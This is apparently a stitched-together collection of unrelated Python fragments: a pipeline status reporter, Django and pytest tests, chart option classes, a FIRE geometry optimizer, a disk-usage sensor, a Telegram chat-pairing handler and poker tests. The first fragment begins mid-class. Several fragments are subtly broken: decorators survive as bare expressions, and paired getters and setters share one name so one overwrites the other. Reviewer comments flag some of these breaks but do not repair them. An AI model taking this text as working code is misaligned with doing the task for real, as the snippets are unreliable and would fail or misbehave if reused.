        """Return a human-readable status summary of the pipeline."""
        if (self.nRunning() > 0):
            status = 'RUNNING'
        elif (self.nWaiting() > 0):
            status = 'WAITING'
        else:
            status = 'COMPLETED'
        report = ('Pipeline status at %s: %s\n\n' % (time.asctime(), status))
        # Unique working directories of completed jobs.
        dirs = []
        for job in self.completed:
            if (job.working_dir not in dirs):
                dirs.append(job.working_dir)
        for dirn in dirs:
            report += ('\t%s\n' % dirn)
        if (self.nWaiting() > 0):
            report += ('\n%d jobs waiting to run\n' % self.nWaiting())
        if (self.nRunning() > 0):
            report += ('\n%d jobs running:\n' % self.nRunning())
            for job in self.running:
                report += ('\t%s\t%s\t%s\n' % (job.label, job.log, job.working_dir))
        if (self.nCompleted() > 0):
            report += ('\n%d jobs completed:\n' % self.nCompleted())
            for job in self.completed:
                report += ('\t%s\t%s\t%s\t%.1fs\t[%s]\n' % (job.label, job.log, job.working_dir, (job.end_time - job.start_time), job.status()))
        return report

    def __del__(self):
        # Drain the queue and terminate anything still running on teardown.
        while (not self.jobs.empty()):
            self.jobs.get()
        for job in self.running:
            logging.debug(('Terminating job %s' % job.job_id))
            print(('Terminating job %s' % job.job_id))
            try:
                job.terminate()
            except Exception as ex:
                logging.error(('Failed to terminate job %s: %s' % (job.job_id, ex)))
def test_set_get_text_alignment():
    """text_alignment round-trips valid values and rejects bad ones.

    Fix: the TypeError branch had a bare `ctx.text_alignment =` with no
    right-hand side (a SyntaxError); assign a non-string value so the
    type check is actually exercised.
    """
    with Drawing() as ctx:
        ctx.text_alignment = 'center'
        assert (ctx.text_alignment == 'center')
        # A non-string value must be rejected with TypeError.
        with raises(TypeError):
            ctx.text_alignment = 0
        # An unknown alignment name must be rejected with ValueError.
        with raises(ValueError):
            ctx.text_alignment = 'not-a-text-alignment-type'
def extract_hash_from_duns_or_uei(duns_or_uei):
    """Look up a recipient hash by DUNS (9 chars) or UEI (12 chars).

    :param duns_or_uei: identifier string; anything of another length
        yields None.
    :return: the recipient_hash value, or None when no row matches.
    """
    # Bug fix: qs_hash was unbound (UnboundLocalError) whenever the input
    # length was neither 9 nor 12; default it and make the branches elif.
    qs_hash = None
    if (len(duns_or_uei) == 9):
        qs_hash = RecipientLookup.objects.filter(duns=duns_or_uei).values('recipient_hash').first()
    elif (len(duns_or_uei) == 12):
        # UEIs are stored upper-cased.
        qs_hash = RecipientLookup.objects.filter(uei=duns_or_uei.upper()).values('recipient_hash').first()
    return (qs_hash['recipient_hash'] if qs_hash else None)
class OptionPlotoptionsHeatmapSonificationDefaultinstrumentoptionsPointgrouping(Options):
    """Point-grouping options for heatmap sonification default instruments.

    NOTE(review): each accessor appears twice (getter + setter sharing a
    name), which suggests @property/@<name>.setter decorators were stripped
    during extraction — confirm against the original source.
    """

    def algorithm(self):
        # Grouping algorithm; defaults to 'minmax'.
        return self._config_get('minmax')

    def algorithm(self, text: str):
        self._config(text, js_type=False)

    def enabled(self):
        # Whether point grouping is active; defaults to True.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def groupTimespan(self):
        # Timespan covered by each group; defaults to 15.
        return self._config_get(15)

    def groupTimespan(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        # Point property used for grouping; defaults to 'y'.
        return self._config_get('y')

    def prop(self, text: str):
        self._config(text, js_type=False)
def iter_stack_frames(frames=None, start_frame=None, skip=0, skip_top_modules=(), config=None):
    """Yield (frame, lineno) pairs for a stack, honouring skip rules.

    :param frames: iterable of frames; when falsy, the stack is walked
        starting from start_frame (or this function's caller).
    :param start_frame: frame to begin walking from when frames is not given.
    :param skip: number of leading frames to skip by position.
    :param skip_top_modules: module-name prefixes skipped only at the top of
        the stack; skipping stops at the first non-matching frame.
    :param config: optional object providing stack_trace_limit (-1 = no limit).
    """
    if (not frames):
        frame = (start_frame if (start_frame is not None) else inspect.currentframe().f_back)
        frames = _walk_stack(frame)
    # -1 is the sentinel for "no limit".
    max_frames = (config.stack_trace_limit if config else (- 1))
    stop_ignoring = False
    frames_count = 0
    for (i, frame) in enumerate(frames):
        if ((max_frames != (- 1)) and (frames_count == max_frames)):
            break
        if (i < skip):
            continue
        f_globals = getattr(frame, 'f_globals', {})
        # Skip frames whose module matches skip_top_modules, but only until
        # the first frame that does not match — after that, never skip again.
        if ((not stop_ignoring) and f_globals.get('__name__', '').startswith(skip_top_modules)):
            continue
        stop_ignoring = True
        f_locals = getattr(frame, 'f_locals', {})
        # Frames flagged with __traceback_hide__ are neither counted against
        # the limit nor yielded.
        if (not _getitem_from_frame(f_locals, '__traceback_hide__')):
            frames_count += 1
            (yield (frame, frame.f_lineno))
def get_mmseqs_version():
    """Probe the MMseqs2 binary and return a human-readable version string.

    Returns a 'version found' message on success, a 'not found' message when
    the binary fails to run, or None if the subprocess yielded nothing.
    """
    cmd = f'{MMSEQS2} version'
    try:
        proc = run(cmd, capture_output=True, check=True, shell=True)
    except CalledProcessError as cpe:
        # Surface only the last stderr line — it carries the actual reason.
        last_err_line = cpe.stderr.decode('utf-8').strip().split('\n')[(- 1)]
        print(("Couldn't find MMseqs2: " + last_err_line), file=sys.stderr)
        return 'MMseqs2 was not found.'
    if proc is None:
        return None
    return f"MMseqs2 version found: {proc.stdout.decode('utf-8').strip()}"
class OPtionsHierarchical(DataClass):
    """Hierarchical layout options backed by the _attrs dictionary.

    NOTE(review): getter/setter pairs sharing one name suggest stripped
    @property/@<name>.setter decorators — confirm against the original.
    """

    def enabled(self):
        # Whether the hierarchical layout is active.
        return self._attrs['enabled']

    def enabled(self, val):
        self._attrs['enabled'] = val

    def levelSeparation(self):
        # Distance between hierarchy levels.
        return self._attrs['levelSeparation']

    def levelSeparation(self, val):
        self._attrs['levelSeparation'] = val

    def nodeSpacing(self):
        # Minimum distance between nodes on the same level.
        return self._attrs['nodeSpacing']

    def nodeSpacing(self, val):
        self._attrs['nodeSpacing'] = val

    def treeSpacing(self):
        # Distance between independent trees.
        return self._attrs['treeSpacing']

    def treeSpacing(self, val):
        self._attrs['treeSpacing'] = val

    def blockShifting(self):
        # Layout refinement: shift whole blocks to reduce whitespace.
        return self._attrs['blockShifting']

    def blockShifting(self, val):
        self._attrs['blockShifting'] = val

    def edgeMinimization(self):
        # Layout refinement: reduce edge length/crossings.
        return self._attrs['edgeMinimization']

    def edgeMinimization(self, val):
        self._attrs['edgeMinimization'] = val

    def parentCentralization(self):
        # Center parents over their children after layout.
        return self._attrs['parentCentralization']

    def parentCentralization(self, val):
        self._attrs['parentCentralization'] = val
def test_no_exo_floor_div_triangular_access(golden):
    """Compile a proc whose inner bound uses floor division and compare the
    generated C (header + source) against the golden reference.

    NOTE(review): an @proc-style decorator on foo appears to have been
    stripped in extraction — confirm against the original source.
    """
    def foo(N: size, x: f32[(N, N)]):
        for ii in seq(0, (N % 4)):
            # Inner trip count depends on ii via floor division — the
            # triangular-access pattern under test.
            for joo in seq(0, ((ii + ((N / 4) * 4)) / 16)):
                x[(ii, joo)] = 0.0
    (c_file, h_file) = compile_procs_to_strings([foo], 'test.h')
    # Header first, then C source, matching the golden file layout.
    code = f'''{h_file}
{c_file}'''
    assert (code == golden)
def extractLptransPassionstampCom(item):
    """Map a feed item from this site to a release message.

    Returns None for previews/non-chapter items, a release message for a
    recognised series tag, and False when no tag matches.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    # Previews and items carrying neither a chapter nor a volume are skipped.
    if ('preview' in item['title'].lower()) or not (chp or vol):
        return None
    # (tag to look for, canonical series name, translation type)
    tagmap = [
        ('Legend of the Continental Heroes', 'Legend of the Continental Heroes', 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for (tagname, name, tl_type) in tagmap:
        if (tagname not in item['tags']):
            continue
        return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
@pytest.mark.django_db
def test_spending_by_award_tas_dates(client, monkeypatch, elasticsearch_award_index, mock_tas_data):
    """spending_by_award honours bpoa/epoa components of TAS code filters.

    Fix: the pytest.mark.django_db decorator had been mangled to a bare
    '.django_db' expression (a SyntaxError); restore it.
    """
    setup_elasticsearch_test(monkeypatch, elasticsearch_award_index)
    # A bpoa-constrained TAS filter matches exactly one award.
    data = {'filters': {'tas_codes': [{'aid': '028', 'main': '8006', 'bpoa': '2011'}], 'award_type_codes': ['A', 'B', 'C', 'D']}, 'fields': ['Award ID'], 'subawards': False}
    resp = client.post('/api/v2/search/spending_by_award', content_type='application/json', data=json.dumps(data))
    assert (resp.status_code == status.HTTP_200_OK)
    assert (len(resp.data['results']) == 1)
    # An epoa-constrained filter matches two awards in the fixture data.
    data = {'filters': {'tas_codes': [{'aid': '028', 'main': '8006', 'epoa': '2013'}], 'award_type_codes': ['A', 'B', 'C', 'D']}, 'fields': ['Award ID'], 'subawards': False}
    resp = client.post('/api/v2/search/spending_by_award', content_type='application/json', data=json.dumps(data))
    assert (resp.status_code == status.HTTP_200_OK)
    assert (len(resp.data['results']) == 2)
def test_delete_stream_admin(db, client, admin_jwt):
    """An admin can delete a video stream; the row is gone afterwards."""
    stream = get_stream(db)
    response = client.delete(f'/v1/video-streams/{stream.id}', content_type='application/vnd.api+json', headers=admin_jwt)
    assert (response.status_code == 200)
    # Re-fetch by primary key; .get returns None once the row is deleted.
    stream = VideoStream.query.get(stream.id)
    # Idiom fix: identity check against None instead of `== None`.
    assert (stream is None)
('cuda.var.gen_function')
def var_gen_function(func_attrs) -> str:
    """Generate CUDA source for the variance op via a Welford reduction.

    NOTE(review): the bare string expression above looks like a stripped
    registry decorator (e.g. @registry.reg('cuda.var.gen_function')) —
    confirm against the original source.
    """
    # Bessel's correction flag selects the unbiased estimator in WelfordData.
    bessel = ('true' if func_attrs['unbiased'] else 'false')
    backend_spec = CUDASpec()
    output_type = func_attrs['outputs'][0]._attrs['dtype']
    elem_output_type = backend_spec.dtype_to_lib_type(output_type)
    # Accumulate in fp32 unless fp16 accumulation is explicitly enabled for
    # fp16 outputs.
    acc_type = 'float'
    if (Target.current()._kwargs.get('use_fp16_acc', False) and (output_type == 'float16')):
        acc_type = elem_output_type
    welford_type = f'WelfordData<{acc_type}, {bessel}>'
    return reduce_3d.gen_function(func_attrs, 'cutlass::welford_op', reduce_3d.DEFAULT_PROLOGUE_TEMPLATE, reduce_3d.DEFAULT_EPILOGUE_SCALAR_TEMPLATE, EXTRA_CODE_TEMPLATE.render(acc_type=acc_type), accumulation_type=welford_type)
class OptionPlotoptionsSolidgaugeSonificationTracksPointgrouping(Options):
    """Point-grouping options for solid-gauge sonification tracks.

    NOTE(review): each accessor appears twice (getter + setter sharing a
    name), which suggests @property/@<name>.setter decorators were stripped
    during extraction — confirm against the original source.
    """

    def algorithm(self):
        # Grouping algorithm; defaults to 'minmax'.
        return self._config_get('minmax')

    def algorithm(self, text: str):
        self._config(text, js_type=False)

    def enabled(self):
        # Whether point grouping is active; defaults to True.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def groupTimespan(self):
        # Timespan covered by each group; defaults to 15.
        return self._config_get(15)

    def groupTimespan(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        # Point property used for grouping; defaults to 'y'.
        return self._config_get('y')

    def prop(self, text: str):
        self._config(text, js_type=False)
class SagemakerTrainingJobConfig(object):
    """Configuration for a SageMaker training job.

    NOTE(review): annotated class attributes with a default suggest a
    stripped @dataclass (or attrs) decorator — confirm against the original.
    """

    # Resource configuration for the training job (instances, volumes, ...).
    training_job_resource_config: _training_job_models.TrainingJobResourceConfig
    # Algorithm specification (image, input mode, ...).
    algorithm_specification: _training_job_models.AlgorithmSpecification
    # Predicate deciding whether this host persists output; by default only
    # the first host of the distributed context does.
    should_persist_output: typing.Callable[([DistributedTrainingContext], bool)] = (lambda dctx: (dctx.current_host == dctx.hosts[0]))
class SparkPSI(SparkStatTestImpl):
    """Population Stability Index (PSI) drift test over Spark data."""

    base_stat_test = psi_stat_test

    def __call__(self, data: SpartStatTestData, feature_type: ColumnType, threshold: float) -> StatTestFuncReturns:
        """Return (psi_value, drift_detected) for the configured column."""
        # Bin reference and current distributions on a shared grid.
        (ref_pct, cur_pct) = get_binned_data(data.reference_data, data.current_data, data.column_name, feature_type)
        # PSI = sum over bins of (ref - cur) * ln(ref / cur).
        contributions = ((ref_pct - cur_pct) * np.log((ref_pct / cur_pct)))
        total = np.sum(contributions)
        # Drift is flagged once the PSI reaches the threshold.
        return (total, (total >= threshold))
def run_dev_modal_com():
    """Serve the app locally via `modal serve`, reporting errors and Ctrl-C."""
    cmd = ['modal', 'serve', 'app']
    try:
        banner = ' '.join(cmd)
        console.print(f" [bold cyan]Running FastAPI app with command: {banner}[/bold cyan]")
        # check=True raises CalledProcessError on a non-zero exit code.
        subprocess.run(cmd, check=True)
    except subprocess.CalledProcessError as e:
        console.print(f' [bold red]An error occurred: {e}[/bold red]')
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop a dev server — not an error.
        console.print('\n [bold yellow]FastAPI server stopped[/bold yellow]')
('dftbp')
@pytest.mark.parametrize('root, ref_energy, ref_norm', [(None, (- 19.), 0.), (1, (- 19.), 0.)])
def test_cytosin_es_forces(root, ref_energy, ref_norm):
    """DFTB+ (excited-state) forces on cytosine should vanish at the minimum.

    Fix: restore @pytest.mark.parametrize, which had been mangled to a bare
    '.parametrize(...)' expression (a SyntaxError).
    NOTE(review): the preceding "('dftbp')" looks like another stripped
    decorator (likely an availability marker) — left as-is, confirm.
    NOTE(review): ref_energy is currently unchecked (energy is only printed).
    """
    geom = geom_loader('lib:cytosin.xyz')
    # Track excited states only when a specific root is requested.
    calc_kwargs = {'parameter': 'mio-ext', 'root': root, 'track': bool(root)}
    calc = DFTBp(**calc_kwargs)
    geom.set_calculator(calc)
    forces = geom.forces
    energy = geom.energy
    norm = np.linalg.norm(forces)
    assert (norm == pytest.approx(ref_norm))
    print('energy', energy)
_handler(commands=['find'])
def find(message: types.Message):
    """Pair two users looking for an anonymous chat partner.

    Uses module globals: `freeid` (chat id of the single user currently
    waiting, or None) and `users` (chat-id -> partner chat-id mapping).
    NOTE(review): '_handler(commands=[...])' above looks like a stripped
    decorator (e.g. @bot.message_handler(...)) — confirm.
    """
    global freeid
    # Users already in a chat cannot search again.
    if (message.chat.id not in users):
        bot.send_message(message.chat.id, 'Finding...')
        if (freeid is None):
            # Nobody is waiting: this user becomes the waiting one.
            freeid = message.chat.id
        else:
            # Someone is waiting: link the two users in both directions.
            bot.send_message(message.chat.id, 'Founded!')
            bot.send_message(freeid, 'Founded!')
            users[freeid] = message.chat.id
            users[message.chat.id] = freeid
            freeid = None
        # Debug dump of pairing state.
        # NOTE(review): original indentation was lost; this print may have
        # belonged inside the else branch only — confirm.
        print(users, freeid)
    else:
        bot.send_message(message.chat.id, 'Shut up!')
class TableQueryValues(SqlTree):
    """An inline VALUES table with a name, a row type, and literal rows."""

    type: Type
    name: str
    rows: list

    def _compile(self, qb):
        """Compile to a named subquery wrapping a VALUES expression."""
        # BigQuery spells inline VALUES differently and takes no field list.
        if (qb.target == 'bigquery'):
            values_cls = BigQueryValues
            fields = None
        else:
            values_cls = Values
            fields = [Name(col_type, col_name) for (col_name, col_type) in self.type.elems.items()]
        subquery = Subquery(self.name, fields, values_cls(self.type, self.rows))
        return subquery._compile(qb)
_deserializable
class TextChunker(BaseChunker):
    """Chunker that splits plain text with a recursive character splitter.

    NOTE(review): the bare '_deserializable' above looks like a stripped
    decorator (@_deserializable) — confirm against the original source.
    """

    def __init__(self, config: Optional[ChunkerConfig]=None):
        # Defaults: 300-character chunks, no overlap, length measured by len().
        if (config is None):
            config = ChunkerConfig(chunk_size=300, chunk_overlap=0, length_function=len)
        text_splitter = RecursiveCharacterTextSplitter(chunk_size=config.chunk_size, chunk_overlap=config.chunk_overlap, length_function=config.length_function)
        super().__init__(text_splitter)
@pytest.mark.django_db
def test_federal_account_content(client, fixture_data):
    """The federal account detail endpoint returns the full fixture payload.

    Fix: the pytest.mark.django_db decorator had been mangled to a bare
    '.django_db' expression (a SyntaxError); restore it.
    """
    resp = client.get('/api/v2/federal_accounts/999-0009/', data={'fiscal_year': 2022})
    expected_result = {'fiscal_year': '2022', 'id': 9999, 'agency_identifier': '999', 'main_account_code': '0009', 'account_title': 'Custom 99', 'federal_account_code': '999-0009', 'parent_agency_toptier_code': '999', 'parent_agency_name': 'Dept. of Depts', 'bureau_name': 'Test Bureau', 'bureau_slug': 'test-bureau', 'total_obligated_amount': 500.0, 'total_gross_outlay_amount': 800.0, 'total_budgetary_resources': 1000.0, 'children': [{'name': 'Cool Treasury Account', 'code': 'tas-label-99', 'obligated_amount': 500.0, 'gross_outlay_amount': 800.0, 'budgetary_resources_amount': 1000.0}]}
    assert (resp.status_code == status.HTTP_200_OK)
    assert (resp.json() == expected_result)
class FIRE(Optimizer):
    """Fast Inertial Relaxation Engine (FIRE) optimizer.

    MD-like minimizer: velocities are mixed toward the force direction;
    after enough downhill steps the timestep grows, while an uphill step
    resets the velocity and shrinks the timestep
    (Bitzek et al., Phys. Rev. Lett. 97, 170201, 2006).
    """

    def __init__(self, geometry, dt=0.1, dt_max=1, N_acc=2, f_inc=1.1, f_acc=0.99, f_dec=0.5, n_reset=0, a_start=0.1, **kwargs):
        """
        :param dt: initial timestep.
        :param dt_max: upper bound for the timestep.
        :param N_acc: downhill steps required before dt may grow.
        :param f_inc: timestep growth factor on downhill steps.
        :param f_acc: decay factor for the mixing parameter a.
        :param f_dec: timestep shrink factor applied on a reset.
        :param n_reset: initial downhill-step counter.
        :param a_start: initial velocity-mixing parameter.
        """
        self.dt = dt
        self.dt_max = dt_max
        self.N_acc = N_acc
        self.f_inc = f_inc
        self.f_acc = f_acc
        self.f_dec = f_dec
        self.n_reset = n_reset
        self.a_start = a_start
        self.a = self.a_start
        self.v = np.zeros_like(geometry.coords)
        # Histories (velocity and timestep per cycle), used for restarts.
        self.velocities = [self.v]
        self.time_deltas = [self.dt]
        super().__init__(geometry, **kwargs)

    def _get_opt_restart_info(self):
        """Serialize the state needed to resume this optimizer."""
        opt_restart_info = {'a': self.a, 'dt': self.dt, 'n_reset': self.n_reset, 'time_delta': self.time_deltas[(- 1)], 'velocity': self.velocities[(- 1)].tolist()}
        return opt_restart_info

    def _set_opt_restart_info(self, opt_restart_info):
        """Restore state from a previously serialized restart dict."""
        self.a = opt_restart_info['a']
        self.dt = opt_restart_info['dt']
        self.n_reset = opt_restart_info['n_reset']
        self.time_deltas = [opt_restart_info['time_delta']]
        velocity = np.array(opt_restart_info['velocity'], dtype=float)
        self.velocities = [velocity]

    def reset(self):
        pass

    def optimize(self):
        """Perform one FIRE step and return the coordinate step."""
        if (self.is_cos and self.align):
            ((self.v,), _, _) = self.fit_rigid(vectors=(self.v,))
        self.forces.append(self.geometry.forces)
        self.energies.append(self.geometry.energy)
        forces = self.forces[(- 1)]
        # Mix the current velocity with the (normalized) force direction.
        mixed_v = (((1.0 - self.a) * self.v) + ((self.a * np.sqrt((np.dot(self.v, self.v) / np.dot(forces, forces)))) * forces))
        last_v = self.velocities[(- 1)]
        if ((self.cur_cycle > 0) and (np.dot(last_v, forces) > 0)):
            # Downhill step: after N_acc accepted steps, grow dt (capped at
            # dt_max) and decay the mixing parameter.
            if (self.n_reset > self.N_acc):
                self.dt = min((self.dt * self.f_inc), self.dt_max)
                self.a *= self.f_acc
            self.n_reset += 1
        else:
            # Uphill step: zero the velocity, reset the mixing parameter and
            # shrink the timestep.
            mixed_v = np.zeros_like(forces)
            self.log('resetted velocities')
            self.a = self.a_start
            # Bug fix: previously `self.dt *= self.f_acc`, which left f_dec
            # unused and barely reduced dt; FIRE shrinks dt by f_dec here.
            self.dt *= self.f_dec
            self.n_reset = 0
        v = (mixed_v + (self.dt * forces))
        self.velocities.append(v)
        self.time_deltas.append(self.dt)
        steps = (self.dt * v)
        steps = self.scale_by_max_step(steps)
        velo_norm = np.linalg.norm(v)
        self.log(f'dt = {self.dt:.4f}, norm(v) {velo_norm:.4f}')
        return steps

    def __str__(self):
        return 'FIRE optimizer'
class HddUsage(SensorInterface):
    """Diagnostic sensor reporting free disk space on the log path."""

    def __init__(self, hostname='', interval=30.0, warn_level=0.95):
        # Warn once usage exceeds this fraction of the disk.
        self._hdd_usage_warn = warn_level
        self._path = LOG_PATH
        SensorInterface.__init__(self, hostname, sensorname='HDD Usage', interval=interval)

    def reload_parameter(self, settings):
        """Pick up warn level and monitored path from the settings store."""
        self._hdd_usage_warn = settings.param('sysmon/Disk/usage_warn_level', self._hdd_usage_warn)
        self._path = settings.param('sysmon/Disk/path', self._path)

    def check_sensor(self):
        """Sample disk usage and publish a diagnostic status message."""
        diag_level = 0
        diag_vals = []
        diag_msg = ''
        try:
            hdd = psutil.disk_usage(self._path)
            diag_level = 0
            diag_vals = []
            # Free-space threshold corresponding to the warn fraction.
            warn_on_space = (hdd.total * (1.0 - self._hdd_usage_warn))
            diag_msg = ('warn at >%s%% (<%s)' % ((self._hdd_usage_warn * 100.0), sizeof_fmt(warn_on_space)))
            warn_level = warn_on_space
            # NOTE(review): diag_level was just set to 0, so this hysteresis
            # branch looks dead — possibly meant to read self._stat_msg.level.
            if (diag_level == DiagnosticStatus.WARN):
                warn_level = (warn_level * 1.1)
            if (hdd.free <= warn_on_space):
                diag_level = DiagnosticStatus.WARN
                diag_msg = ('Free disk space on log path only %s (warn on <%s)' % (sizeof_fmt(hdd.free), sizeof_fmt(warn_on_space)))
            diag_vals.append(KeyValue(key='Free', value=hdd.free))
            diag_vals.append(KeyValue(key='Free [%]', value=('%.2f' % (100.0 - hdd.percent))))
            diag_vals.append(KeyValue(key='Path', value=self._path))
        except Exception as err:
            # Bug fix: previously assigned `warn_level`, which is never read
            # afterwards, so sampling errors were reported at level 0;
            # raise the published diagnostic level instead.
            diag_level = DiagnosticStatus.WARN
            diag_msg = ('%s' % err)
            diag_vals.append(KeyValue(key='Free', value='---'))
            diag_vals.append(KeyValue(key='Free [%]', value='---'))
            diag_vals.append(KeyValue(key='Path', value=self._path))
        # Publish under the mutex shared with the reporting thread.
        with self.mutex:
            self._ts_last = time.time()
            self._stat_msg.level = diag_level
            self._stat_msg.values = diag_vals
            self._stat_msg.message = diag_msg
class OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpass(Options):
    """Lowpass-filter mapping options for areasplinerange sonification."""

    def frequency(self) -> 'OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
        # Sub-options object controlling the lowpass cutoff frequency mapping.
        return self._config_sub_data('frequency', OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassFrequency)

    def resonance(self) -> 'OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassResonance':
        # Sub-options object controlling the lowpass resonance mapping.
        return self._config_sub_data('resonance', OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassResonance)
class _TestController(ControllerBase):
    """WSGI controller used by the routing test; checks injected config.

    NOTE(review): the bare tuples preceding the handler methods look like
    stripped @route(...) decorators — confirm against the original source.
    """

    def __init__(self, req, link, data, **config):
        super(_TestController, self).__init__(req, link, data, **config)
        # The test harness passes test_param='foo' through the data dict.
        eq_(data['test_param'], 'foo')

    ('test', '/test/{dpid}', methods=['GET'], requirements={'dpid': dpidlib.DPID_PATTERN})
    def test_get_dpid(self, req, dpid, **_kwargs):
        # Echo the parsed dpid back as the response body.
        return Response(status=200, body=dpid)

    ('test', '/test')
    def test_root(self, req, **_kwargs):
        return Response(status=200, body='root')
def test_init_identity_negative():
    """Identity.__init__ rejects every invalid address/public-key combination
    with the documented error message."""
    name = 'some_name'
    address_1 = 'some_address'
    addresses_1 = {'some_ledger_id': 'some_address'}
    addresses_2 = {}
    public_key_1 = 'some_public_key'
    public_keys_1 = {'some_ledger_id': 'some_public_key'}
    public_keys_2 = {}
    with pytest.raises(ValueError, match='Provide a key for the default address.'):
        Identity(name, default_address_key=None)
    # Neither an address nor an addresses dict supplied.
    with pytest.raises(ValueError, match='Either provide a single address or a dictionary of addresses, and not both.'):
        Identity(name)
    # Both a single address and an addresses dict supplied.
    with pytest.raises(ValueError, match='Either provide a single address or a dictionary of addresses, and not both.'):
        Identity(name, address=address_1, addresses=addresses_1)
    with pytest.raises(ValueError, match='Provide at least one pair of addresses.'):
        Identity(name, addresses=addresses_2)
    with pytest.raises(ValueError, match='If you provide a dictionary of addresses, you must provide its corresponding dictionary of public keys.'):
        Identity(name, addresses=addresses_1)
    with pytest.raises(ValueError, match='If you provide a dictionary of addresses, you must not provide a single public key.'):
        Identity(name, addresses=addresses_1, public_key=public_key_1)
    # Key-set mismatches between the two dictionaries.
    with pytest.raises(AEAEnforceError, match='Keys in public keys and addresses dictionaries do not match. They must be identical.'):
        Identity(name, addresses=addresses_1, public_keys=public_keys_2)
    with pytest.raises(AEAEnforceError, match='The default address key must exist in both addresses and public keys dictionaries.'):
        Identity(name, addresses=addresses_1, public_keys=public_keys_1, default_address_key='some_other_ledger')
    with pytest.raises(ValueError, match='If you provide a single address, you must not provide a dictionary of public keys.'):
        Identity(name, address=address_1, public_keys=public_keys_1)
    with pytest.raises(ValueError, match='If you provide a single address, you must provide its corresponding public key.'):
        Identity(name, address=address_1)
def test_working_hours_argument_data_is_not_in_correct_range1():
    """Out-of-range minute values in working_hours raise ValueError."""
    import copy
    from stalker import defaults
    working_hours = copy.copy(defaults.working_hours)
    # -10 is below the valid 0-1440 minute range.
    working_hours['sun'] = [[(- 10), 1000]]
    with pytest.raises(ValueError) as cm:
        WorkingHours(working_hours=working_hours)
    assert (str(cm.value) == 'WorkingHours.working_hours value should be a list of lists of two integers between and the range of integers should be 0-1440, not [[-10, 1000]]')
@pytest.mark.parametrize('address, slot, new_value', ((INVALID_ADDRESS, 0, 0), (ADDRESS, b'\x00', 0), (ADDRESS, 0, b'\x00'), (ADDRESS, 0, None), (ADDRESS, None, 0)))
def test_set_storage_input_validation(state, address, slot, new_value):
    """set_storage rejects malformed addresses, slots, and values.

    Fix: restore @pytest.mark.parametrize, which had been mangled to a bare
    '.parametrize(...)' expression (a SyntaxError).
    """
    with pytest.raises(ValidationError):
        state.set_storage(address, slot, new_value)
class ForceReply(JsonSerializable):
    """Telegram ForceReply markup: asks clients to show a reply interface."""

    def __init__(self, selective: Optional[bool]=None, input_field_placeholder: Optional[str]=None):
        # When set, only the targeted users are forced to reply.
        self.selective: bool = selective
        # Placeholder text shown in the input field while replying.
        self.input_field_placeholder: str = input_field_placeholder

    def to_json(self):
        """Serialize to the JSON payload expected by the Bot API."""
        payload = {'force_reply': True}
        # Optional fields are included only when meaningful.
        if (self.selective is not None):
            payload['selective'] = self.selective
        if self.input_field_placeholder:
            payload['input_field_placeholder'] = self.input_field_placeholder
        return json.dumps(payload)
class PatchConfig():
    """Context manager that temporarily overrides foundry_dev_tools config.

    On enter, applies the overrides and stores the previous module-level
    state; on exit, restores that state.
    """

    def __init__(self, config_overwrite: 'dict | None'=None, initial_config_overwrite: 'dict | None'=None, read_initial: bool=False):
        # Overrides applied to the initial (pre-merge) configuration.
        self.initial_config_overwrite = initial_config_overwrite
        # Overrides applied to the effective configuration.
        self.config_overwrite = config_overwrite
        # Whether to re-read the initial configuration first.
        self.read_initial = read_initial
        # Saved previous state; populated by __enter__.
        self.conf_save = None

    def __enter__(self):
        self.conf_save = override_config(initial_config_overwrite=self.initial_config_overwrite, config_overwrite=self.config_overwrite, read_initial=self.read_initial)

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Restore module-level config only when __enter__ actually saved one.
        if self.conf_save:
            (foundry_dev_tools.config.INITIAL_CONFIG, foundry_dev_tools.config.FOUNDRY_DEV_TOOLS_DIRECTORY, foundry_dev_tools.config.FOUNDRY_DEV_TOOLS_PROJECT_CONFIG_FILE) = self.conf_save[0]
            foundry_dev_tools.config.Configuration = self.conf_save[1]
def has_been_completed_by(poll, user):
    """Return True when `user` has cast at least one vote in `poll`."""
    votes = TopicPollVote.objects.filter(poll_option__poll=poll)
    if not user.is_anonymous:
        return votes.filter(voter=user).exists()
    # Anonymous voters are tracked via a per-forum session key.
    forum_key = get_anonymous_user_forum_key(user)
    if forum_key:
        return votes.filter(anonymous_key=forum_key).exists()
    # No forum key: an anonymous user without one can never have voted.
    return votes.none().exists()
def write_date(f, t_millis):
    """Append one log record (timestamp plus full rover state) to stream `f`.

    NOTE(review): despite the name, this writes the wall-clock time,
    t_millis, and the rover's kinematic and control state; `rover` appears
    to be a module-level global — confirm.
    """
    # Wall-clock time formatted as HHMMSS.microseconds.
    write_scalar(f, datetime.datetime.now().strftime('%H%M%S.%f'))
    write_scalar(f, t_millis)
    # Kinematic state: position, velocity, acceleration, angular velocity,
    # attitude matrix.
    write_vector(f, rover.x)
    write_vector(f, rover.v)
    write_vector(f, rover.a)
    write_vector(f, rover.W)
    write_3x3(f, rover.R)
    # Controller setpoints: desired position/velocity, heading, angular
    # velocity, attitude.
    write_vector(f, rover.control.xd)
    write_vector(f, rover.control.xd_dot)
    write_vector(f, rover.control.b1d)
    write_vector(f, rover.control.Wd)
    write_3x3(f, rover.control.Rd)
    # Record terminator.
    f.write('\n')
def test_short_deck_1():
    """Three-player hand: pre-flop action order, then folds to terminal."""
    n_players = 3
    (state, _) = _new_game(n_players=n_players)
    # Expected pre-flop acting order by seat index.
    player_i_order = [2, 0, 1]
    for i in range(n_players):
        assert (state.current_player.name == f'player_{player_i_order[i]}')
        assert (len(state.legal_actions) == 3)
        assert (state.betting_stage == 'pre_flop')
        state = state.apply_action(action_str='call')
    # All players called: the hand moves to the flop.
    assert (state.betting_stage == 'flop')
